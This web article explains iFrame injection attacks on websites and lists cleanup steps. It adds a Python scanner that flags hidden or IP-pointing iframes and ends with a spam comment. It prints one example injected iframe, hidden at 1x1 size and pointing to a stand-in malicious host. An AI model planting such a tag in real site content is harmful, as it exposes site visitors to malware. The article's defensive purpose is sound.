
iFrame Injection

An iFrame injection is a very common cross-site scripting (XSS) attack. It consists of one or more iFrame tags that have been inserted into a page or post’s content, and these typically download an executable program or carry out other actions that compromise the site visitors’ computers. In the best case, Google may label the site “malicious.” In the worst case, the site owner and visitors end up with malware-infected computers.

iFrame Injection Examples

A basic iFrame injection may be something as simple as:

<iframe src="http://www.badwebsite.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>

The injection is not visible unless the page source is viewed, and it often points directly to an IP address instead of a website.

Steps to Take if a Site is Hit with an iFrame Injection

Step 1 – Take the site offline for maintenance until the infection source is found and removed to avoid putting site visitors at risk of infection.

Step 2 – Change all passwords associated with the site. This includes the CMS login(s) (if one is used), FTP passwords, database passwords, web server passwords, and so on. Use strong replacements for the new set (i.e., they should contain upper and lower case letters, numbers, and symbols).

Step 3 – Store a copy of the infected website on a portable device such as a thumb drive or CD/DVD-R in the event that additional analysis must be done once the site is recovered.

Step 4 – Fully replace the site if there are backup copies of it. Scan the backup files with an anti-virus program to ensure that the iFrame injection has not infected them with computer malware.

Step 5 – If there are no backup copies of the site, open each HTML or PHP page that generates HTML in a text editor to look for the offending iFrame code entries. If there was an attack, it is very likely that the offending iFrame code is in more than one location on the site. Depending on the website size, this may take a bit of time to accomplish. Remove the code as soon as it is found and save the updated page.

Step 6 – Upload the site and test to ensure that the iFrame injection no longer exists. After this, check the site to see how the malicious code was injected. It may have been injected because outdated versions of Content Management Systems such as WordPress or Joomla were being used, a cheap web host that does not update server software was being used, or the code was injected as an HTML comment. Once the way the attack was likely conducted is determined, update the software or find an alternative web hosting service if required. Other common attack sources include improper security settings on the server’s site files and running a custom coded HTML site.

Step 7 – Pay attention to visitor actions on the site to see if the injection attack is attempted again and consider shifting from FTP to SFTP in order to upload new files to the account. Be sure to change the site passwords at least once a month and keep up to date with software updates moving forward.
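The manual search in Step 5 and the re-check in Step 6 can be run over a local copy of the site with a short script. The following is an added example, not code from the original article: it lists every iframe in the HTML and PHP files and marks the traits described above (1x1 size, hidden style, a src that is a bare IP address). The function names, the extra checks for zero size and display:none, and the two sample files are assumptions constructed for illustration.

```python
import ipaddress, re, tempfile
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")

def iframe_flags(tag):
    """Return the traits of an <iframe> tag that match the injection described above."""
    attrs = {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
             for m in ATTR_RE.finditer(tag)}
    reasons = []
    dims = [attrs.get(k, "").lower().rstrip("px").strip() for k in ("width", "height")]
    if any(d in ("0", "1") for d in dims):
        reasons.append("tiny")
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden")
    try:  # a src whose host is a bare IP address instead of a domain name
        ipaddress.ip_address(urlparse(attrs.get("src", "")).hostname or "")
        reasons.append("ip-host")
    except ValueError:
        pass
    return reasons

def scan_site(root, exts=(".html", ".htm", ".php")):
    """List (relative path, line number, reasons) for every iframe in the site copy."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            text = path.read_text(errors="replace")
            for m in IFRAME_RE.finditer(text):
                line = text.count("\n", 0, m.start()) + 1
                findings.append((path.relative_to(root).as_posix(), line, iframe_flags(m.group(0))))
    return findings

def demo():
    """Scan two constructed sample files (203.0.113.7 is a documentation-only address)."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "index.html").write_text("<html><body>\n<p>Welcome</p>\n"
            '<iframe src="http://203.0.113.7/inject/?s=x" width="1" height="1"'
            ' style="visibility: hidden"></iframe>\n</body></html>\n')
        Path(d, "about.php").write_text('<?php echo "<h1>About</h1>"; ?>\n'
            '<iframe src="https://video.example.com/embed/1" width="560" height="315"></iframe>\n')
        return scan_site(d)

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Iframes with an empty reasons list are still listed so that each one can be confirmed as an embed the site owner placed deliberately.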


Comments (1)

 

  1. cheap hats says:

    I recently stumbled on the article and have been reading along. I would like to express our appreciation within your writing talent as well as ability to help make audience study in the first place for the conclusion. I would like to go through more recent content and to talk about my personal feelings along with you.

